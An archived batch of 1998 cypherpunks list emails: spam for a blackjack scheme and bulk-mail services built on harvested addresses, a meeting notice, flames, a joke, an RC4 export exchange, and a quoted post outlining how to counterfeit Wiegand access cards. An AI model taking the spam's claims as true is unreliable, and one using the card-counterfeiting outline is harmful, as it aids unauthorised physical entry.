Message-ID: <199807311953.VAA25070@replay.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP MESSAGE-----
Version: 2.6.2

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
cCpuMp0VbewsOQ==
=i0Ix
-----END PGP MESSAGE-----
                          *** The Fire House Inn ***
                                 Come visit us
                               Telnet: fhouse.org
                                WWW:  fhouse.org
                                  *********** 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blkjck@gate.net
Date: Thu, 2 Jul 1998 20:39:35 -0700 (PDT)
To: Friend@public.com
Subject: Win At Blackjack
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


"This is a one time mailing, if you are not interested, simply hit 'delete'."


Win at Blackjack


Fed up at losing your hard earned money in a casino?

Fed up with the loser's drive home?

Fed up with being in a multimillion dollar luxury casino and wondering which part you helped finance?

Well learn how to play the game! Give yourself a fighting chance...

I am a twenty-seven year veteran of the Casino Industry and I paid for my computer amongst many other items by playing Blackjack using this method.

Its simple to understand, no card counting involved, and will take minutes to learn........ Good Luck!


Send $21 and your mailing address to :                        (Free Shipping):

J.R.Nyman
8401 South Wood Circle
Apt #13
Fort Myers, FL  33919










Thank you for your time....
















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hugh Daniel <hugh@east.toad.com>
Date: Fri, 10 Jul 1998 21:25:35 -0700 (PDT)
To: cypherpunks-announce@toad.com
Subject: ANNOUNCE: Bay Area Cypherpunks, Sat.July 11, 12-6, KPMG Mountain View
Message-ID: <199807110201.TAA03498@east.toad.com>
MIME-Version: 1.0
Content-Type: text/plain



The July Bay Area Cypherpunks Meeting will be Saturday July 11 198
from 12-6, at KPMG, 500 E. Middlefield Rd., Mountain View.

Sameer Parekh will talk about the SSL / PKCS#1 crack and repair.

Dinner after the meeting will be at some restaurant on Castro
St. Mtn.View.

Directions: KPMG is a relatively-unmarked building at the corner of
Middlefield Rd. and Ellis St. in a Netscape-infested section of
Mountain View.
The lobby entrance is on the Ellis St. side.  
The Ellis exit on 101 is between 85 and 237.

http://www.mapblast.com/mapblast/blast.hm?CMD=MAP&GC=X%3A-122.05265%7CY%3A37.39603%7CLT%3A37.39603%7CLN%3A-122.05265%7CLS%3A20000%7Cc%3AMountain_View%7Cs%3ACA%7Cz%3A94043%7Cd%3A807%7Cp%3AUSA&LV=3&IC=37.39603%3A37.39603&IC=5&IC%3A=KPMG&GAD2=500+E+Middlefield+Rd&GAD3=Mountain+View%2C+CA++94043-4008&W=600&H=350&MA=1&zoom.x=28&zoom.y=172

Probable speakers for next month:
- Sue Bardakos from Entrust 
- Paul Kocher talking about differential power analysis

-----------
Mailing list administrivia - this announcement has been sent to
        cypherpunks@cyberpass.net
        cypherpunks-announce@toad.com
        coderpunks@toad.com
        cryptography@c2.net
If you want to get off one of the lists, send mail to
        listname-request@machine.domain   (probably majordomo!)
for the listserver that sent you the mail.
-----------

                                Thanks! 
                                        Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: toto@fhouse.org
Date: Sat, 1 Aug 1998 14:28:30 +0800
To: cypherpunks@toad.com
Subject: Re: From: dac@zurich.ibm.com (Marc Dacier)
Message-ID: <TCPSMTP.18.8.1.0.8.20.2847582152.1142403@fhouse.org>
MIME-Version: 1.0
Content-Type: text




ME>STOP SENDING ME EMAILS MR PAYNE
ME>STOOOPPPP IITTTT!!!!!!

ME>bill payne wrote:

ME>> Friday 7/31/98 11:40 AM
ME>>...[EVERYTHING IN THE WHOLE WORLD, NOT LEAVING OUT A SINGLE WORD]...

Yo BadBillyP,
  You know, as a result of the massive amounts of on-topic SPAM/RANTS
you send to
the CypherPunks Disturbed Male LISP,  many CPUNX are finding it hard to
find time to
find and read the multiple CHAPTER/SPAMS of SAHMD!!! that I hack out
with my
Cleaver, since the Secret Service took away my ChainSaw.

  Well, BadBillyP, not only does the Bienfait Nutly News not mind the
competition
you provide for the time and attention of the CypherPunks ReaderShip
Market
(despite the fact that you have a natural advantage, not having spent
six years
 getting through Grade 4, as a result of 'problems' with math),  but
welcome your
efforts drive other targets of your missives, such as Mr. Merata, Esq.,
crazy enough
to become potential subscribers to the CypherPunks Disturbed Male LISP.
  I am prepared to offer you 25% of all CypherPunks Anarchist Union
Dues that
are collected from KmartTargets of your missives who join up and pay
their dues
in Cash/UnmarkedNonSequentialSmallBills.

TruthMonger
p.s. - THE REASON THAT ALL MATHEMATICIANS EVENTUALLY GO !!!CRAZY!!! IS
      THAT THEY SPEND THEIR WHOLE LIVES WORKING WITH NUMBERS WHICH
      ONLY COME IN !CAPITALS!1234567890!!1234567890!!!1234567890!

p.p.s - I won't send this post directly to you,  since I noticed from a
recent post of
       yours, that you don't read your email.  Go figure...
                          *** The Fire House Inn ***
                                 Come visit us
                               Telnet: fhouse.org
                                WWW:  fhouse.org
                                  *********** 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paulmerrill@acm.org (Merlyn At Camelot)bgould@home.com (Brian Jay Gould)
Date: Mon, 3 Aug 1998 02:37:28 +0800
To: Cypherpunks@Algebra.COM
Subject: (fwd) IBM's committment to UNIXIBM's committment to UNIX
Message-ID: <35c4bec2.5318772@cesvxa.ces.edu>
MIME-Version: 1.0
Content-Type: message/rfc822



I have witnesses that this actually happened a few years ago:

My client was trying to pick a server platform and was torn between Sun 
and IBM for the UNIX server.  Finally, after receiving a generous 
discount from IBM, they chose IBM's AIX.  Unfortunately, I had no AIX 
experience, so I was overheard saying, "...but I know how to do this on 
Sun..."  Another consultant was brought in who claimed that he had some 
AIX experience and he was also overheard by the director saying, "...but 
I know how to do this on Sun."

So the director was so frustrated, he called IBM and asked to have their 
best AIX professional sent over to straighten us out.  In the director's 
office, he was told the problem and his first words were, "Gee, that's 
tough.  I'm not sure, but I do know how to do that on Sun."

The Sun servers arrived without comment from the director.

-- 
Selected by Jim Griffith.  MAIL your joke to funny@netfunny.com.

If you mail to original@netfunny.com, it makes sure that your joke is tagged
as your original work, Always attribute the source of a joke, whether it's
you, or somebody else.  For the full submission guidelines,
see http://www.netfunny.com/rhf/

This joke's link: http://www.netfunny.com/rhf/jokes/98/Aug/sunserv.html





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mailwizz@bigfoot.com
Date: Thu, 13 Aug 1998 05:09:17 +0800
To: <cypherpunks-unedited@toad.com>
Subject: Bulk emailing service
Message-ID: <199808122051.NAA02650@toad.com>
MIME-Version: 1.0
Content-Type: text




                       Bulkman Direct Email Promotion

           Bulkman --> Call (336) 584-4715 for ordering information,         
                   custom orders, and Website information.  

Bulkman Services offers professional, effective direct email advertising to 
promote your business or website.  With our service you will reach thousands 
of people who are interested in what you have to offer.  We can send up to 
200,000 emails out for you with your own sales letter.  The email addresses 
that we use are freshly extracted daily from people actually online either 
chatting or surfing! Plus, the people who receive your email aren't 
overloaded with other offers.  We also offer targeted emailing using a target 
audience that you specify, for example - music lovers, single mothers, 
college students, etc.  

We use up to date, high quality programs to effectively extract fresh 
addresses and successfully mail your message.  This is why our service is 
more effective than others - Bulkman will give the sales boost you've been 
looking for.  Try out our services and  you will be overloaded with response 
and sales!!!


We accept any questions and phone orders -   

Call --> (336) 584-4715    - Anytime -







===========================================================
Based upon your previous Internet postings or visits to one of our affiliate 
web sites, you have been carefully selected to receive the following as a 
person interested in business possibilities.  If you have received this 
message in error, please accept our apology as a responsible e-mailer.
However, this is a ONE TIME only announcement and
 
 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nmmg@nationalmmg.com
Date: Mon, 17 Aug 1998 12:27:44 +0800
To: <cypherpunks-unedited@toad.com>
Subject: Bulk emailing service
Message-ID: <199808170341.UAA17066@toad.com>
MIME-Version: 1.0
Content-Type: text




                       Bulkman Direct Email Promotion


          VISIT OUR WEBSITE NOW!!! --> http://www.nationalmmg.com

          Bulkman --> Call (336) 584-4715 for ordering information,          
                  custom orders, and Website information.  

Bulkman Services offers professional, effective direct email advertising to 
promote your business or website.  With our service you will reach thousands 
of people who are interested in what you have to offer.  We can send up to 
200,000 emails out for you with your own sales letter.  The email addresses 
that we use are freshly extracted daily from people actually online either 
chatting or surfing! Plus, the people who receive your email aren't 
overloaded with other offers.  We also offer targeted emailing using a target 
audience that you specify, for example - music lovers, single mothers, 
college students, etc.  

We use up to date, high quality programs to effectively extract fresh 
addresses and successfully mail your message.  This is why our service is 
more effective than others - Bulkman will give the sales boost you've been 
looking for.  Try out our services and  you will be overloaded with response 
and sales!!!


We accept any questions and phone orders -   

Call --> (336) 584-4715    - Anytime -

Website --> http://www.nationalmmg.com





=========================================================================
Based upon your previous Internet postings or visits to one of our affiliate 
web sites, you have been carefully selected to receive the following as a 
person interested in business possibilities.  If you have received this 
message in error, please accept our apology as a responsible e-mailer. Reply 
to this email with "remove" in the subject line and we will NEVER email you 
again.

 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bluesky17@mailexcite.com
Date: Tue, 15 Sep 1998 19:31:16 +0800
To: <cypherpunks@toad.com>
Subject: MASS EMAIL WORKS!!
Message-ID: <199809160024.RAA14530@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



THE GOOD NEWS! MASS E-MAIL MAY BE THE ANSWER!

Everyday millions of people on the internet with an E-Mail 
address
recieve a solicitation for a product. Many respond and purchase 
that product.
When your ad is placed directly in front of tens of thousand of 
consumers, your 
chances of a successful marketing program is very good!


THE BETTER NEWS! WE DO ALL THE WORK FOR YOU!

We advise you on ad copy, suggest different stratagies, tell you 
what works 
and what doesn't and most important of all....send your ad for 
you! 
Our pricing (per page, no color, no porn, no AOL, multiple 
domains)
100K ads mailed....................................$99.00
500K       "          .............................$199.00    
1million   "         ..............................$299.00
2million   "         ..............................$469.00
3million   "         ..............................$599.00
Each additional million............................$99.00
Additional pages add 20% per page

OUR SPECIALTY IS TARGETED CONSUMERS
Call us for more information!

THE BEST NEWS! WE ANSWER OUR CALLS LIVE!

Call us at (702) 257-8547 ext 143 (you must have this extention 
to do business 
with us and to receive the above pricing) Monday thru Friday 9:00 
am to 3:00 pm
Pacific Standard Time for more information. In the unlikely event 
we are unavailable, 
our trusty voice will take your message, page us, and we will 
return your call forthwith.

NOTE: For those on the internet who do not want to recieve 
exciting messages 
such as this.....
* To be removed from our mailing list, call us 
direct @ 702-257-8547 ext 143 for removal. Impolite requests take 
a little longer.......

*We strive to comply with all state and federal laws and to send 
ads only to interested parties.

*This ad is not intended for nor do we knowingly send to 
Washington State residents. 
We have over 75 million e-mail addresses, and to remove all 
Washington State addresses is 
difficult at best. 

*To be removed from our mailing list, CALL 702-257-8547 ext 12 
and politely leave your e-mail address. 
Your e-mail address will be removed from our list and our 
affilate lists 

* OR CLICK_HERE_TO_GOTO_REMOVE-LIST.COM   
(http://remove-list.com)
Remove-List is a free public service offering to help the general 
public
get removed from commercial mailings lists and has not sent this 
message.
If you want their help please add your name to their list and we 
you will
not receive a commercial email from us or any other member bulk 
emailer.

* Responding to the "return address" will NOT have your name 
removed. 




PRINT THIS AD FOR FUTURE CONSIDERATION!!
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: EKR <ekr@rtfm.com>
Date: Mon, 21 Sep 1998 19:41:03 +0800
To: Tom Weinstein <tomw@netscape.com>
Subject: Re: Questions for Magaziner?
In-Reply-To: <v03130304b227b7401a3a@[24.128.118.53]>
Message-ID: <kj4sv5u9u3.fsf@speedy.rtfm.com>
MIME-Version: 1.0
Content-Type: text/plain



Tom Weinstein <tomw@netscape.com> writes:

> > Arnold G. Reinhold wrote:
> >
> > One question I'd like asked is whether the US Gov will approve 56-bit RC-4
> > for export on the same terms as 56-bit DES. That would allow export
> > versions of web browsers to be upgraded painlessly, making international
> > e-commerce 64 thousand times more secure than existing 40-bit browsers.
> > (56-bit DES browsers would require every merchant to upgrade their SSL
> > servers and introduce a lot of unneeded complexity.)
> 
> Actually, it wouldn't be any easier to deploy 56-bit RC4 than DES.  Either
> would require roughly the same changes to both clients and servers.
And from a protocol perspective, it would be worse, at least for
SSL, since SSL doesn't have a 56 bit RC4 mode at all.

-Ekr
-- 
[Eric Rescorla                                   ekr@rtfm.com]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "chungdoo" <chungdoo@chungdoo.co.kr>
Date: Mon,  2 Aug 1999 21:26:56 -0700 (PDT)
To: cypherpunks@einstein.ssz.com
Subject: baby carrier
Message-ID: <199808031300280540.0061DF4C@kotec.net>
MIME-Version: 1.0
Content-Type: text/plain



 We are pleased to take this opportunity to introduce ourselves as one of
 the leading manufacturers-exporters of high grade Baby walker, Baby
 carrier, Baby swing, Mickey Basketball and  Accesorries with beautiful shape in Korea.   

 We hope the articles will be just what you want for outstanding ones 
 compared with the competitors' in quality and design as well.

 Our baby products has the outstanding points as follows:
 * Baby walker
  - Spring Cushion Type
 * Baby carrier
  - Comfortable, safe and ligh frame
  - Padded headrest and Shoulder straps
  - Adjustable inner seat
  - Large removable storage bag for baby supplies
  - Padded waist belt  
 * family carrier
  - Ages 6 months to 2 years
  - Frame : Aluminum
  - Fabric : Nylon
  - Weight : 1200 g/PC
  - Double seats for baby and child
 * simple carrier
  - Ages 6 months to 3 years
  - Fabric : Nylon
  - Support baby with your arms
  - Simple fuction, simple carrying
  - Pouch for storage
  - See through vinyl package

 * 3+  SWING 
  Our toys are tested to company the requirement of European Standard (Safety 
  of Toys).
  This high quality product
  is  on all age swing.

  If has different size settings,  depending on the size of  your child you can
  fit the  back into either inside (smaller)or(larger)setting.

  Back Support and front restraint shield are removable.  So if can be
  converted into  three swings(infant Swing,  Chair Swign and Seat swing)
  suitable for children 6 months  up to 12 years old. 
 * DO RE MI  SWING

 * SEVEN  MICKEY
 - A  Mini Basketball Set
 - Non Toxic PVC Ball
 * TEN  MICKEY
 * FIFTEEN  MICKEY
 * Accesorries
 * Feeding  echievements
 * Baby  Gift  Set

 To see the design, pls visit our web site, http://www.chungdoo.co.kr and 
 do not hesitate to send your requirements so that we may show you our best
 service.

 We are looking forward to hearing a good news from you soon.

 Faithfully yours,
 
 K. J. Kang, President
 Chung Doo Corporation
 Tel : (82-2) 565-3115, 565-3885
 Fax : (82-2) 565-3110
 e-mail : chungdoo@chungdoo.co.kr
 URL : http://www.chungdoo.co.kr

   







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anooshiravan Merat <merata@sums.ac.ir>
Date: Fri, 31 Jul 1998 14:00:31 -0700 (PDT)
To: bill payne <billp@nmol.com>
Subject: Re: From: dac@zurich.ibm.com (Marc Dacier)
In-Reply-To: <35C20839.43A1@nmol.com>
Message-ID: <35C22BB0.398F875A@sums.ac.ir>
MIME-Version: 1.0
Content-Type: text/plain


STOP SENDING ME EMAILS MR PAYNE
STOOOPPPP IITTTT!!!!!!

bill payne wrote:

> Friday 7/31/98 11:40 AM
>
> John Young
>
> I am looking at http://www.jya.com/raid98.htm
>
> Dacier asked me why NSA/Sandia was concerned about what
> each bit in an executable image did when I was in his office in
> Zurich in April 1997.
>
> Spiking, of course.  A SECRET OTHER FUNCTION to a device.
>
> http://caq.com/cryptogate  http://www.aci.net/kalliste/speccoll.htm
>
> NSA/Sandia doesn't trust its own employees!
>
> On the other hand, NSA/Sandia employees don't trust NSA/Sandia either.
>
> The REAL WORLD again.
>
> IBM Zurich was BIG into Java.
>
> Network World, July 20, 1998 page 6
>
>   The incredible shrinking Java alliance
>
>   By Chris Nerney and Andy Eddy
>
>     A year ago there were four of them, members of a new alliance
>   touting a potent new weapon designed to end Microsoft Corp.'s
>   growing dominance in the computing industry.
>     Now the Java Gang of Four is the Gang of Two and a Half.
>     Java creator Sun Microsystems, Inc., of course, is still fully
>   committed to the programming language, as is IBM. ...
>
> Not looking good for Java future.
>
> Java is similar to FORTH.  FORTH executes super-slow on high-level
> in most machines.  About 10% of the speed of a compiled-language
> program - such as Visual Basic.
>
> Specialized Forth and Java machine can be made to run fast.
> http://groucho.gsfc.nasa.gov/forth/ and http://www.ptsc.com/
>
> But I am not confident Java or Forth machines are going anywhere.
> May be hard to get parts in the future.
>
> But I'm confident about the 80C32 supply!
> http://www.apcatalog.com/cgi-bin/AP?ISBN=0125475705&LOCATION=US&FORM=FORM2
>
> Let's hope this UNFORTUNATE matter http://jya.com/whpfiles.htm gets
> settled soon so that we can move on to constructive projects.
>
> Later
> bill
>
> /\/\/\
>
> Marc
>
> Since I was working the OTHER SIDE of
>
>   Recent Advances in Intrusion Detection
>
> for the FBI, I might be able to give a nice talk about what the US
> government is REALLY UP TO on defeating intrusion detection!
>
> I am not reading e-mail.
>
> best
> bill
>
> Hi Matthias!
>
>   ------------------------------------------------------------------------
> Counterfeiting Wiegand Wire Access Credentials
>
>                                    Bill Payne
>
>                                  October 16,1996
>
>                                     Abstract
>
>                   Wiegand wire access credentials are easy and
>                   inexpensive to counterfeit.
>
>         Access Control & Security Systems Integration magazine, October
>         1996 [http://www/securitysolutions.com] published the article,
>
>              Wiegand technology stands the test of time
>
>              by PAUL J. BODELL, page 12
>
>              Many card and reader manufacturers offer Wiegand (pronounced
>              wee-gand) output.  However, only three companies in the
>              world make Wiegand readers.  Sensor Engineering of Hamden
>              Conn., holds the patent for Wiegand, and Sensor has licensed
>              Cardkey of Simi Valley, Calif., and Doduco of Pforzheim,
>              Germany, to manufacture Wiegand cards and readers. ...  A
>              Wiegand output reader is not the same thing as a Wiegand
>              reader,  and it is important to understand the differences.
>
>                 In brief, Wiegand reader use the Wiegand effect to
>              translate card information around the patented Wiegand
>              effect in which a segment of a specially treated wire
>              generates an electronic pulse when subjected to a specific
>              magnetic field.  If the pulse is generated when the wire is
>              near a pick-up coil, the pulse can be detected by a circuit.
>              Lining up several rows of wires and passing them by a cold
>              would generate a series of pulses.  Lining up two rows of
>              wires - calling on row "zero bits" and the other "one bits"
>              - and passing them by two different coils would generate two
>              series of pulses, or data bits.  These data bits can then be
>              interpreted as binary data and used to control other
>              devices.  If you seal the coils in a rugged housing with
>              properly placed magnets, and LED and some simple circuitry,
>              you have a Wiegand reader.  Carefully laminate the special
>              wires in vinyl, and artwork, and hot-stamp a number on the
>              vinyl, and you have a Wiegand card.
>
>              IN THE BEGINNING
>
>                Wiegand was first to introduce to the access control
>              market in the late 1970s.  It was immediately successful
>              because it filled the need for durable, secure card and
>              reader technology.
>                Embedded in the cards, Wiegand wires cannot be altered or
>              duplicated. ...
>
>         Bodell's Last statement is incorrect.
>
>         Tasks for EASILY counterfeiting Wiegand wire cards are
>
>         1    Locate the wires inside the card to read the 0s and 1s.
>
>         2    Build an ACCEPTABLE copy of the card.
>
